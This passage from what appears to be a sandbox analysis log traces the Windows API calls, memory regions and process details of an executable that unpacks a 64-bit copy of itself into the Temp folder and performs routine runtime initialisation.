e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x70\x3e\x80\x4c\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0299.254] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0299.254] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0299.254] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0299.254] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0299.254] GetCurrentProcess () returned 0xffffffff [0299.254] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0299.254] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0299.254] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0299.254] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0299.255] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0299.255] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0299.255] LockResource (hResData=0x43c648) returned 0x43c648 [0299.255] GetCurrentPackageId () returned 0x3d54 [0299.255] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0299.255] GetLastError () returned 0x20 [0299.255] GetLastError () returned 0x20 [0299.255] SetLastError (dwErrCode=0x20) [0299.255] GetLastError () returned 0x20 [0299.255] SetLastError (dwErrCode=0x20) [0299.255] GetLastError () returned 0x20 [0299.255] SetLastError (dwErrCode=0x20) [0299.255] GetLastError () returned 0x20 [0299.255] SetLastError (dwErrCode=0x20) [0299.255] GetLastError () returned 0x20 [0299.255] SetLastError (dwErrCode=0x20) [0299.255] GetLastError () returned 0x20 [0299.255] SetLastError (dwErrCode=0x20) [0299.256] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0299.256] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0299.256] ExitProcess (uExitCode=0x1) Thread: id = 1013 os_tid = 0xcdc Process: id = "151" image_name = "vidhs3md64.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe" page_root = "0x71930000" os_pid = "0xcc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "146" os_parent_pid = "0xc74" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10299 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10300 start_va = 0x30000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10301 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10302 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 10303 start_va = 0x7fc57000 end_va = 0x7fc57fff entry_point = 0x0 region_type = private name = "private_0x000000007fc57000" filename = "" Region: id = 10304 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10305 start_va = 0x140000000 end_va = 0x140045fff entry_point = 0x140000000 region_type = mapped_file name = "vidhs3md64.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe") Region: id = 10306 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 10307 start_va = 0x7ff5ffff6000 end_va = 0x7ff5ffff6fff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffff6000" filename = "" Region: id = 10308 start_va = 0x7ff5ffffd000 end_va = 0x7ff5ffffefff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffd000" filename = "" Region: id = 10309 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10312 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 10313 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10314 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10315 start_va = 0x180000 end_va = 0x23dfff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10316 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 10317 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 10318 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10319 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10320 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10321 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10322 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 10323 start_va = 0x7ff5ffffb000 end_va = 0x7ff5ffffcfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffb000" filename = "" Region: id = 10324 start_va = 0x7ffaf7930000 end_va = 0x7ffaf7a07fff entry_point = 0x7ffaf7930000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 10325 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10326 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10327 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10328 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 10329 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10330 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10331 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10332 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 10333 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10334 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10335 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 10336 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10337 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10398 start_va = 0x7ffae5c40000 end_va = 0x7ffae5ce9fff entry_point = 0x7ffae5c40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 10449 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 10450 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10451 start_va = 0x5f0000 end_va = 0x623fff entry_point = 0x5f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10452 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10453 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10454 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10455 start_va = 0x240000 end_va = 0x246fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 10456 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 10457 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10458 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 10459 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 10460 start_va = 0x7c0000 end_va = 0x1bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 10461 start_va = 0x1bc0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Thread: id = 1009 os_tid = 0xcc8 [0298.530] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0298.530] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName=0x1400212e0) returned 0x7ffaf70f02a0 [0298.530] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsFree") returned 0x7ffaf70f23f0 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsGetValue") returned 0x7ffaf70e63c0 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsSetValue") returned 0x7ffaf70ed920 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffaf70f5620 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateEventExW") returned 0x7ffaf70f5580 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSemaphoreExW") returned 0x7ffaf70f55e0 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadStackGuarantee") returned 0x7ffaf70f0e10 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolTimer") returned 0x7ffaf70ef110 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolTimer") returned 0x7ffaf7a4cb10 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffaf7a55790 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolTimer") returned 0x7ffaf7a4ea10 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolWait") returned 0x7ffaf70f28c0 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolWait") returned 0x7ffaf7a4c470 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolWait") returned 0x7ffaf7a55410 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffaf7aa42f0 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffaf7a895e0 [0298.531] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffaf7aa3130 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLogicalProcessorInformation") returned 0x7ffaf70f0fb0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSymbolicLinkW") returned 0x7ffaf7112720 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetDefaultDllDirectories") returned 0x7ffaf4f0e7a0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="EnumSystemLocalesEx") returned 0x7ffaf71128e0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CompareStringEx") returned 0x7ffaf70e6010 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetDateFormatEx") returned 0x7ffaf7112a00 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLocaleInfoEx") returned 0x7ffaf70f0310 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTimeFormatEx") returned 0x7ffaf7112bc0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetUserDefaultLocaleName") returned 0x7ffaf70f25d0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsValidLocaleName") returned 0x7ffaf7112cd0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="LCMapStringEx") returned 0x7ffaf70e6000 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentPackageId") returned 0x7ffaf4ea45e0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTickCount64") returned 0x7ffaf70e65a0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0298.532] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0298.533] GetCurrentThreadId () returned 0xcc8 [0298.533] GetStartupInfoW (in: lpStartupInfo=0x14fe90 | out: lpStartupInfo=0x14fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x273560)) [0298.533] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0298.533] GetFileType (hFile=0x8) returned 0x2 [0298.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0298.533] GetFileType (hFile=0xc) returned 0x2 [0298.533] GetStdHandle (nStdHandle=0xfffffff4) returned 0x10 [0298.533] GetFileType (hFile=0x10) returned 0x2 [0298.533] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0298.533] GetEnvironmentStringsW () returned 0x2744f0* [0298.533] FreeEnvironmentStringsW (penv=0x2744f0) returned 1 [0298.533] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 0x33 [0298.534] GetLastError () returned 0x0 [0298.534] SetLastError (dwErrCode=0x0) [0298.534] GetLastError () returned 0x0 [0298.534] SetLastError (dwErrCode=0x0) [0298.534] GetLastError () returned 0x0 [0298.534] SetLastError (dwErrCode=0x0) [0298.534] GetACP () returned 0x4e4 [0298.534] GetLastError () returned 0x0 [0298.535] SetLastError (dwErrCode=0x0) [0298.535] IsValidCodePage (CodePage=0x4e4) returned 1 [0298.535] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fe00 | out: lpCPInfo=0x14fe00) returned 1 [0298.535] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8a0 | out: lpCPInfo=0x14f8a0) returned 1 [0298.535] GetLastError () returned 0x0 [0298.535] SetLastError (dwErrCode=0x0) [0298.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0298.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ棨霮") returned 256 [0298.535] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ棨霮", cchSrc=256, lpCharType=0x14fbc0 | out: lpCharType=0x14fbc0) returned 1 [0298.535] GetLastError () returned 0x0 [0298.535] SetLastError (dwErrCode=0x0) [0298.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0298.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0298.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0298.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" 